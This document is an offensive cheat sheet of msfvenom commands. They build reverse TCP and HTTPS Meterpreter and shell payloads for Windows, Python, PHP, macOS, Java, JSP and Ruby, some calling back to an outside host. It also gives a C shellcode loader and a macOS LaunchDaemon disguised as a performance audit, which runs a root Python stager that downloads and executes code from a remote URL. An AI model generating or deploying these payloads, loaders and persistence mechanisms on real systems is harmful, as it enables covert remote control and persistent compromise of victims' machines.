Some msfvenom commands

Windows x64 reverse TCP Meterpreter payload

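# Exe output. This is the reverse_tcp stager, so name the artefact accordingly:
# the reverse_https command further down also writes win64https.exe and would
# silently overwrite this one. SessionExpirationTimeout=0 and
# SessionCommunicationTimeout=0 disable the session expiry / keepalive timeouts.
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=cc.vuln.be LPORT=51337 SessionExpirationTimeout=0 SessionCommunicationTimeout=0 -f exe -o win64tcp.exe

# PowerShell output: the same stager emitted as a byte array in PowerShell
# syntax (-f powershell), with no encoder applied (-e generic/none); -t 0
# disables the stdin read timeout and EXITFUNC=thread makes the payload exit
# its thread rather than the process. You still need your own loader to put
# the bytes in executable memory and run them. Nothing in this command
# encrypts anything; for an RC4-wrapped array in 'C' syntax use
# `-f c --encrypt rc4 --encrypt-key <key>` and decrypt in the C/C++ loader.
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=cc.vuln.be LPORT=51337 SessionExpirationTimeout=0 SessionCommunicationTimeout=0 EXITFUNC=thread -f powershell -t 0 -e generic/none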

Windows x64 reverse HTTPS Meterpreter payload

# Same x64 stager, but calling back over HTTPS on 443; both session timeouts
# disabled; written out as a PE executable.
msfvenom --arch x64 --platform windows --payload windows/x64/meterpreter/reverse_https LHOST=cc.vuln.be LPORT=443 SessionExpirationTimeout=0 SessionCommunicationTimeout=0 --format exe --out win64https.exe

Windows x86 (32-bit) reverse TCP Meterpreter payload

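# 32-bit build. msfvenom's architecture name is x86 (there is no "x32" arch, the
# original flag was a typo), and the 32-bit payload path carries no arch segment.
# shikata_ga_nai with 3 iterations is polymorphic *encoding*, not encryption —
# do not treat it as an AV bypass.
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/shikata_ga_nai -i 3 -f exe -o payload.exe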

Windows x64 reverse HTTPS PowerShell Meterpreter payload

# x64 HTTPS stager as a PowerShell script (-f psh), wrapped by the
# cmd/powershell_base64 encoder so the script body is a base64 blob.
msfvenom --payload windows/x64/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 --encoder cmd/powershell_base64 --format psh --out payload.ps1

Python reverse HTTPS Meterpreter payload

# Pure-Python HTTPS stager written out as source; no --format given, so msfvenom
# emits the raw script. Session timeouts disabled as in the Windows variants.
msfvenom --platform python --payload python/meterpreter/reverse_https LHOST=cc.vuln.be LPORT=443 SessionExpirationTimeout=0 SessionCommunicationTimeout=0 --out pythonHttps.py

PHP reverse TCP Meterpreter payload

# PHP stager, obfuscated with the php/base64 encoder and written raw.
# NOTE(review): before deploying, check that payload.php begins with an opening
# <?php tag and prepend one if the generated file lacks it — otherwise the web
# server returns the source as plain text instead of executing it.
msfvenom --payload php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 --encoder php/base64 --format raw --out payload.php

OSX x64 reverse TCP Meterpreter payload

# Stageless macOS Meterpreter (meterpreter_reverse_tcp with the underscore is the
# single-stage variant) as a Mach-O binary. Despite the .bin name this is an
# executable: chmod +x it on the target before running.
msfvenom --payload osx/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=51339 --format macho --out payload.bin

Java reverse TCP Meterpreter payload

# Runnable JAR containing the Java Meterpreter stager (run with java -jar payload.jar).
msfvenom --payload java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 --platform java --format jar --out payload.jar

Java reverse TCP shell JSP payload

# JSP page that spawns a plain reverse shell (not Meterpreter) when requested
# from a servlet container.
msfvenom --payload java/jsp_shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 --out payload.jsp

Ruby reverse TCP shell payload (a plain shell — there is no Ruby Meterpreter here)

# Ruby script giving a plain reverse shell; ruby/shell_reverse_tcp is not a
# Meterpreter payload, so expect a raw shell session on the handler.
msfvenom --platform ruby --payload ruby/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 --out payload.rb

Custom loader

# Loader
/* Placeholder for the raw shellcode bytes. Paste the string literal that
 * `msfvenom -f c` emits here; note that msfvenom names the array
 * `unsigned char buf[]`, which is what the one-line loader variant further
 * down expects, so either rename it or keep the name consistent. */
char code[] = "shellcode";

int main(int argc, char **argv)
{
  /* Treat the byte array as a function taking no arguments and jump into it.
   * NOTE(review): `code` lives in the writable data segment, which is not
   * executable under DEP/NX on current Windows, Linux and macOS builds, so
   * this call faults unless the bytes are first copied into memory mapped
   * RX/RWX (VirtualAlloc + VirtualProtect, or mmap/mprotect). */
  int (*entry)(void) = (int (*)(void))code;
  entry();
  return 0;
}

// or, as a one-liner when the array keeps msfvenom's default name `buf`
// (same caveat: `buf` must be in executable memory or the call faults):
int (*ret)() = (int(*)())buf; ret(); 

Persistence (macOS LaunchDaemon running a Python stager)

cat /etc/vendor/touch   # the stager launchd starts; only the header is shown here, the full script is listed after the plist below

#!/usr/bin/python
# ...

/Library/LaunchDaemons/com.support.PerfomanceAudit.plist (writing here needs root, and launchd refuses to load a daemon plist unless it is owned by root:wheel and not group- or world-writable; the daemon then runs as root at boot):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.support.PerfomanceAudit</string>
    <key>LaunchOnlyOnce</key>
    <true/>
    <key>ProgramArguments</key>
    <array>
        <string>/etc/vendor/touch</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>
# The plist's ProgramArguments names the script directly with no interpreter,
# so it must be executable; the shebang line then selects python.
chmod +x -- /etc/vendor/touch
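#!/usr/bin/python
# Stager started by the LaunchDaemon above: poll a URL until it serves a
# script, exec that script in this module's namespace, then exit. Any failure
# (network, TLS, HTTP, or the fetched code raising) waits 60 s and retries.
#
# NOTE(review): whatever the server returns is executed — as root when loaded
# from /Library/LaunchDaemons — with no integrity check beyond TLS, and on
# Python < 2.7.9 / 3.4.3 urllib does not verify certificates at all.

import sys
import time

# urlopen lives in urllib.request on Python 3 and in urllib on Python 2; pick
# the module by major version so the same file runs under either interpreter.
u = __import__('urllib' + {2: '', 3: '.request'}[sys.version_info[0]],
               fromlist=('urlopen',))

while True:
    try:
        r = u.urlopen('https://meter.site/meter')
        try:
            payload = r.read()
        finally:
            r.close()
        # Executed at module level on purpose: code exec'd inside a function
        # would get function-local globals, which breaks fetched scripts that
        # define and then call their own functions.
        exec(payload)
    except Exception:
        # Catch Exception rather than a bare `except:` — the original bare
        # clause also caught the SystemExit raised by exit(0) inside the try,
        # so a successful run slept 60 s and re-fetched instead of exiting.
        time.sleep(60)
        continue
    sys.exit(0)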